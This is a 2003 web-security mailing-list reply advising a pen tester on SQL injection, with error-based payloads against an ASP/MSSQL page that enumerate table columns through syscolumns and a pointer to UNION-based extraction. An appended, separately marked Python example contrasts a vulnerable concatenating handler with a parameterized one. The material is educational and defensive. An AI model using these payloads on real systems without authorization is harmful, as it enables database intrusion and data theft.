WebApp Sec mailing list archives

Re: SQL Injection Basics


From: NetNinja <netninja () hotmail kg>
Date: Sun, 9 Feb 2003 16:21:46 +0600

Hello raul,

Sunday, February 9, 2003, 7:21:47 AM, you wrote:


rjhc> I am pen testing a webapp and am having some problems with SQL injection. 

rjhc> The app creates an ODBC error. Is this a guarantee of SQL Injection?

rjhc> If I use www.victim/test.asp?userid=sfdsd

rjhc> the error is "incorrect syntax near line 28 of test.asp" (or that's the English translation equiv in my case).

try inputtin single quote " ' " and c if it throws back ODBC error.

rjhc> I know the database is called master, and has a table test. What is the syntax I should use?

well u can try enumerating columns of ur TEST table like this
www.victim/test.asp?userid=' select convert(int,(select top 1 name from
syscolumns where id=(select id from sysobjects where name='TEST')))--
this will try to convert nvarchar value to int and throws back error
where u will c first column name of ur TEST table. then u proceed
further
www.victim/test.asp?userid=' select convert(int,select top 1 name from
syscolumns where id=object_id("TEST") and name>'put here column
name returned from previous query')--

once u know column names u can try to retrieve data with UNION
or with select convert()

something like that...

well u can check out some great papers written by top sql injection
ninjas like Kevin Spett, Chris Anley, Cesar Cerrudo and others.
interestin to read paypaz. :)
check out owasp.org

rjhc> What are the best freeware and open source tools for testing SQL injection?
rjhc> I tried WPoison which was OK.

heh, haven't heard of that

rjhc> I also tried WebSleuth (which seems to have gone from GPL to closed source commercial btw). Am I right in saying
rjhc> that the SQL plugin has to connect directly to the database to work? I can only
rjhc> see port 80 so don't think this will work?

rjhc> Thanks, Raul.


-- 
Best regards,
 NetNinja                            mailto:netninja () hotmail kg
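
Added example (not part of the original message or of either poster's code): a sketch of why the test.asp behaviour in this thread occurs and how the handler side closes it, written in Python with the standard-library sqlite3 module as a stand-in for the ASP/ODBC stack. The table contents, function names and response strings are assumptions made for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data standing in for the thread's "test" table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE test (userid INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO test VALUES (1, 'alice')")
    return db

def lookup_vulnerable(db, userid):
    """Concatenates the parameter into the SQL text and echoes driver errors."""
    try:
        row = db.execute("SELECT name FROM test WHERE userid=" + userid).fetchone()
        return 200, (row[0] if row else "not found")
    except sqlite3.Error as exc:
        # The raw database message reaches the client, like the ODBC error page.
        return 500, str(exc)

def lookup_hardened(db, userid, log):
    """Validates the type, binds the value, keeps error detail server-side."""
    if not re.fullmatch(r"[0-9]{1,9}", userid):
        return 400, "invalid userid"
    try:
        row = db.execute("SELECT name FROM test WHERE userid=?",
                         (int(userid),)).fetchone()
        return 200, (row[0] if row else "not found")
    except sqlite3.Error as exc:
        log.append(repr(exc))  # detail goes to the server log only
        return 500, "internal error"

def run_demo():
    # The three inputs: a valid id, the "sfdsd" value from the thread, a lone quote.
    db, log = make_db(), []
    return {value: (lookup_vulnerable(db, value), lookup_hardened(db, value, log))
            for value in ("1", "sfdsd", "'")}

if __name__ == "__main__":
    for value, (vuln, hard) in run_demo().items():
        print(repr(value), "vulnerable:", vuln, "hardened:", hard)
```

In the concatenating handler both the bare word and the lone quote are parsed as SQL and the database's own message is returned to the client; the bound, validated version rejects both before any statement is built.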